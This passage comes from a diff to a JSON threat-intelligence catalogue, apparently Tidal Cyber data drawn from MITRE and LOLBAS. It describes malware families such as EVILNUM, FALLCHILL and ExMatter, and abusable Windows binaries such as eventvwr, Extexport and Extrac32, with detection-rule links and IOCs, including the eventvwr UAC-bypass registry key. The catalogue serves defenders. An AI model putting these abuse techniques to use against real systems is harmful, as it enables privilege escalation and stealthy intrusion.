"eafca858-2534-4dea-b50c-ddf9a9a490f8", + "type": "similar" + } + ], + "uuid": "a7e71387-b276-413c-a0de-4cf07e39b158", + "value": "Epic" + }, + { + "description": "", + "meta": { + "id": "e68d12cb-d521-4b56-ac52-dbc881ff6198" + }, + "related": [ + { + "dest-uuid": "a7589733-6b04-4215-a4e7-4b62cd4610fa", + "type": "similar" + } + ], + "uuid": "285440ba-037a-4b5c-a089-e0af02a62236", + "value": "esentutl.exe" + }, + { + "description": "[esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[[Microsoft Esentutl](https://app.tidalcyber.com/references/08fb9e84-495f-4710-bd1e-417eb8191a10)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0404", + "source": "MITRE", + "tags": [ + "ee88899a-2bf0-4b96-bf69-5b686fa463c3", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "c256da91-6dd5-40b2-beeb-ee3b22ab3d27", + "type": "similar" + }, + { + "dest-uuid": "285440ba-037a-4b5c-a089-e0af02a62236", + "type": "similar" + } + ], + "uuid": "a7589733-6b04-4215-a4e7-4b62cd4610fa", + "value": "esentutl" + }, + { + "description": "[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]", + "meta": { + "id": "799734c8-b95b-4d68-9781-3fc4b09178a0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4c371bd9-c97c-42ab-b913-1e19cd409382", + "type": "similar" + } + ], + "uuid": "51125aee-d1af-4414-90fa-84b6c977c100", + "value": "Eventvwr.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Displays Windows Event Logs in a GUI window.\n\n**Author:** Jacob Gajek\n\n**Paths:**\n* C:\\Windows\\System32\\eventvwr.exe\n* C:\\Windows\\SysWOW64\\eventvwr.exe\n\n**Resources:**\n* [https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)\n* [https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1](https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1)\n* [https://twitter.com/orange_8361/status/1518970259868626944](https://twitter.com/orange_8361/status/1518970259868626944)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml)\n* Sigma: [registry_set_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml)\n* Sigma: [file_event_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml)\n* Elastic: [privilege_escalation_uac_bypass_event_viewer.toml](https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml)\n* Splunk: [eventvwr_uac_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml)\n* IOC: eventvwr.exe launching child process other than mmc.exe\n* IOC: Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5105", + "source": "Tidal Cyber", + "tags": [ + "59d03fb8-0620-468a-951c-069473cb86bc", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "51125aee-d1af-4414-90fa-84b6c977c100", + "type": "similar" + } + ], + "uuid": "4c371bd9-c97c-42ab-b913-1e19cd409382", + "value": "Eventvwr" + }, + { + "description": "[EvilBunny](https://app.tidalcyber.com/software/300e8176-e7ee-44ef-8d10-dff96502f6c6) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.[[Cyphort EvilBunny Dec 2014](https://app.tidalcyber.com/references/a0218d0f-3378-4508-9d3c-a7cd3e00a156)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0396", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a8a778f5-0035-4870-bb25-53dc05029586", + "type": "similar" + } + ], + "uuid": "300e8176-e7ee-44ef-8d10-dff96502f6c6", + "value": "EvilBunny" + }, + { + "description": "EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a \"Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication\".[[GitHub evilginx2](/references/eea178f4-80bd-49d1-84b1-f80671e9a3e4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5078", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a13bd574-b907-4489-96ab-8d30faf7fca4", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + } + ], + "uuid": "4892c22d-6fd4-4876-8e8a-af968cf61ecc", + "value": "EvilGinx" + }, + { + "description": "[EvilGrab](https://app.tidalcyber.com/software/e862419c-d6b6-4433-a02a-c1cc98ea6f9e) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) via malicious Microsoft Office documents as part of spearphishing campaigns. [[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0152", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "2f1a9fd0-3b7c-4d77-a358-78db13adbe78", + "type": "similar" + } + ], + "uuid": "e862419c-d6b6-4433-a02a-c1cc98ea6f9e", + "value": "EvilGrab" + }, + { + "description": "[EVILNUM](https://app.tidalcyber.com/software/e0eaae6d-5137-4053-bf37-ff90bf5767a9) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://app.tidalcyber.com/software/e0eaae6d-5137-4053-bf37-ff90bf5767a9) is used by the APT group [Evilnum](https://app.tidalcyber.com/groups/4bdc62c9-af6a-4377-8431-58a6f39235dd) which has the same name.[[ESET EvilNum July 2020](https://app.tidalcyber.com/references/6851b3f9-0239-40fc-ba44-34a775e9bd4e)][[Prevailion EvilNum May 2020](https://app.tidalcyber.com/references/533b8ae2-2fc3-4cf4-bcaa-5d8bfcba91c0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0568", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4bdc62c9-af6a-4377-8431-58a6f39235dd", + "type": "used-by" + }, + { + "dest-uuid": "7cdfccda-2950-4167-981a-60872ff5d0db", + "type": "similar" + } + ], + "uuid": "e0eaae6d-5137-4053-bf37-ff90bf5767a9", + "value": "EVILNUM" + }, + { + "description": "[Exaramel for Linux](https://app.tidalcyber.com/software/c773f709-b5fe-4514-9d88-24ceb0dd8063) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://app.tidalcyber.com/software/21569dfb-c9f1-468e-903e-348f19dbae1f).[[ESET TeleBots Oct 2018](https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0401", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "11194d8b-fdce-45d2-8047-df15bb8f16bd", + "type": "similar" + } + ], + "uuid": "c773f709-b5fe-4514-9d88-24ceb0dd8063", + "value": "Exaramel for Linux" + }, + { + "description": "[Exaramel for Windows](https://app.tidalcyber.com/software/21569dfb-c9f1-468e-903e-348f19dbae1f) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://app.tidalcyber.com/software/c773f709-b5fe-4514-9d88-24ceb0dd8063).[[ESET TeleBots Oct 2018](https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0343", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "051eaca1-958f-4091-9e5f-a9acd8f820b5", + "type": "similar" + } + ], + "uuid": "21569dfb-c9f1-468e-903e-348f19dbae1f", + "value": "Exaramel for Windows" + }, + { + "description": "[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]", + "meta": { + "id": "55ea10d2-76b8-40ff-928c-2c4f15737702", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "46efd94e-afd2-4536-8525-0619fc56966f", + "type": "similar" + } + ], + "uuid": "a878dcfe-76d9-435d-8b14-b0490db7e1a8", + "value": "Excel.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5221", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a878dcfe-76d9-435d-8b14-b0490db7e1a8", + "type": "similar" + } + ], + "uuid": "46efd94e-afd2-4536-8525-0619fc56966f", + "value": "Excel" + }, + { + "description": "ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.[[Symantec Noberus September 22 2022](/references/afd6808d-2c9f-4926-b7c6-ca9d3abdd923)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5054", + "source": "Tidal Cyber", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + } + ], + "uuid": "068b26ae-39b5-4b4e-8faa-eb304a17687d", + "value": "ExMatter" + }, + { + "description": "", + "meta": { + "id": "393f6896-278c-47b8-9ee0-e1c546bf1087", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5d7a39e3-c667-45b3-987e-3b0ca49cff61", + "type": "similar" + } + ], + "uuid": "7ffda0fe-4375-443e-a8c7-df5dabc104f9", + "value": "Expand.exe" + }, + { + "description": "[Expand](https://app.tidalcyber.com/software/5d7a39e3-c667-45b3-987e-3b0ca49cff61) is a Windows utility used to expand one or more compressed CAB files.[[Microsoft Expand Utility](https://app.tidalcyber.com/references/bf73a375-87b7-4603-8734-9f3d8d11967e)] It has been used by [BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) to decompress a CAB file into executable content.[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0361", + "source": "MITRE", + "tags": [ + "182dd4be-bbda-404f-aad1-156a22bbe7a4", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "type": "similar" + }, + { + "dest-uuid": "7ffda0fe-4375-443e-a8c7-df5dabc104f9", + "type": "similar" + } + ], + "uuid": "5d7a39e3-c667-45b3-987e-3b0ca49cff61", + "value": "Expand" + }, + { + "description": "[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]", + "meta": { + "id": "99210c23-bd09-4df1-8545-da1d37a9c2df", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "b792d713-fbb4-46e6-94ae-8b9a1f4e794d", + "type": "similar" + } + ], + "uuid": "f6b34f5e-3bec-4098-98b8-2ea74f184ecc", + "value": "Explorer.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used for managing files and system components within Windows\n\n**Author:** Jai Minton\n\n**Paths:**\n* C:\\Windows\\explorer.exe\n* C:\\Windows\\SysWOW64\\explorer.exe\n\n**Resources:**\n* [https://twitter.com/CyberRaiju/status/1273597319322058752?s=20](https://twitter.com/CyberRaiju/status/1273597319322058752?s=20)\n* [https://twitter.com/bohops/status/1276356245541335048](https://twitter.com/bohops/status/1276356245541335048)\n* [https://twitter.com/bohops/status/986984122563391488](https://twitter.com/bohops/status/986984122563391488)\n\n**Detection:**\n* Sigma: [proc_creation_win_explorer_break_process_tree.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml)\n* Sigma: [proc_creation_win_explorer_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml)\n* Elastic: [initial_access_via_explorer_suspicious_child_parent_args.toml](https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml)\n* IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5106", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "f6b34f5e-3bec-4098-98b8-2ea74f184ecc", + "type": "similar" + } + ], + "uuid": "b792d713-fbb4-46e6-94ae-8b9a1f4e794d", + "value": "Explorer" + }, + { + "description": "[Explosive](https://app.tidalcyber.com/software/572eec55-2855-49ac-a82e-2c21e9aca27e) is a custom-made remote access tool used by the group [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937). It was first identified in the wild in 2015.[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)][[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0569", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "6a21e3a4-5ffe-4581-af9a-6a54c7536f44", + "type": "similar" + } + ], + "uuid": "572eec55-2855-49ac-a82e-2c21e9aca27e", + "value": "Explosive" + }, + { + "description": "[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]", + "meta": { + "id": "a864c2cc-2ff2-4c45-a6dd-fef6ad7c7fc1", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2e6f1aed-a983-44fb-aed1-b4a3d9cb9488", + "type": "similar" + } + ], + "uuid": "ef321c97-a66d-4dbc-8ed6-c002e141ffdc", + "value": "Extexport.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Load a DLL located in the c:\\test folder with a specific name.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Internet Explorer\\Extexport.exe\n* C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/](http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_extexport.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml)\n* IOC: Extexport.exe loads dll and is execute from other folder the original path[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5107", + "source": "Tidal Cyber", + "tags": [ + "5b81675a-742a-4ffd-b410-44ce3f1b0831", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ef321c97-a66d-4dbc-8ed6-c002e141ffdc", + "type": "similar" + } + ], + "uuid": "2e6f1aed-a983-44fb-aed1-b4a3d9cb9488", + "value": "Extexport" + }, + { + "description": "ExtPassword is a tool used to recover passwords from Windows systems.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5030", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "363c38fc-8676-4a63-b3f4-f0237565a951", + "value": "ExtPassword" + }, + { + "description": "[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]", + "meta": { + "id": "776f532a-3bd6-44eb-870f-a726cc951ba0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "53dc0180-0309-4489-af75-9c76b2887359", + "type": "similar" + } + ], + "uuid": "84483c62-922d-49c5-b688-c106c2496545", + "value": "Extrac32.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Extract to ADS, copy or overwrite a file with Extrac32.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\extrac32.exe\n* C:\\Windows\\SysWOW64\\extrac32.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n* [https://twitter.com/egre55/status/985994639202283520](https://twitter.com/egre55/status/985994639202283520)\n\n**Detection:**\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* Sigma: [proc_creation_win_lolbin_extrac32.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml)\n* Sigma: [proc_creation_win_lolbin_extrac32_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml)[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5108", + "source": "Tidal Cyber", + "tags": [ + "92092803-19a9-4288-b7fb-08e92e8ea693", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "84483c62-922d-49c5-b688-c106c2496545", + "type": "similar" + } + ], + "uuid": "53dc0180-0309-4489-af75-9c76b2887359", + "value": "Extrac32" + }, + { + "description": "[FakeM](https://app.tidalcyber.com/software/8c64a330-1457-4c32-ab2f-12b6eb37d607) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4). [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0076", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6c1bdc51-f633-4512-8b20-04a11c2d97f4", + "type": "used-by" + }, + { + "dest-uuid": "bb3c1098-d654-4620-bf40-694386d28921", + "type": "similar" + } + ], + "uuid": "8c64a330-1457-4c32-ab2f-12b6eb37d607", + "value": "FakeM" + }, + { + "description": "[FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) is a RAT that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) malware or delivered when a victim unknowingly visits a compromised website. [[US-CERT FALLCHILL Nov 2017](https://app.tidalcyber.com/references/045e03f9-af83-4442-b69e-b80f68e570ac)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0181", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "fece06b7-d4b1-42cf-b81a-5323c917546e", + "type": "similar" + } + ], + "uuid": "ea47f1fd-0171-4254-8c92-92b7a5eec5e1", + "value": "FALLCHILL" + }, + { + "description": "[FatDuke](https://app.tidalcyber.com/software/997ff740-1b00-40b6-887a-ef4101e93295) is a backdoor used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2016.[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0512", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "54a01db0-9fab-4d5f-8209-53cef8425f4a", + "type": "similar" + } + ], + "uuid": "997ff740-1b00-40b6-887a-ef4101e93295", + "value": "FatDuke" + }, + { + "description": "[Felismus](https://app.tidalcyber.com/software/c66ed8ab-4692-4948-820e-5ce87cc78db5) is a modular backdoor that has been used by [Sowbug](https://app.tidalcyber.com/groups/6632f07f-7c6b-4d12-8544-82edc6a7a577). [[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)] [[Forcepoint Felismus Mar 2017](https://app.tidalcyber.com/references/23b94586-3856-4937-9b02-4fe184b7ba01)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0171", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6632f07f-7c6b-4d12-8544-82edc6a7a577", + "type": "used-by" + }, + { + "dest-uuid": "196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "type": "similar" + } + ], + "uuid": "c66ed8ab-4692-4948-820e-5ce87cc78db5", + "value": "Felismus" + }, + { + "description": "[[ESET GreyEnergy Oct 2018](https://app.tidalcyber.com/references/f3e70f41-6c22-465c-b872-a7ec5e6a3e67)]", + "meta": { + "id": "84b19011-a651-47b7-9d5e-24c8cf54c2ae" + }, + "related": [ + { + "dest-uuid": "4b1a07cd-4c1f-4d93-a454-07fd59b3039a", + "type": "similar" + } + ], + "uuid": "78026ff0-63f0-42d8-81de-e02ad8223d68", + "value": "GreyEnergy 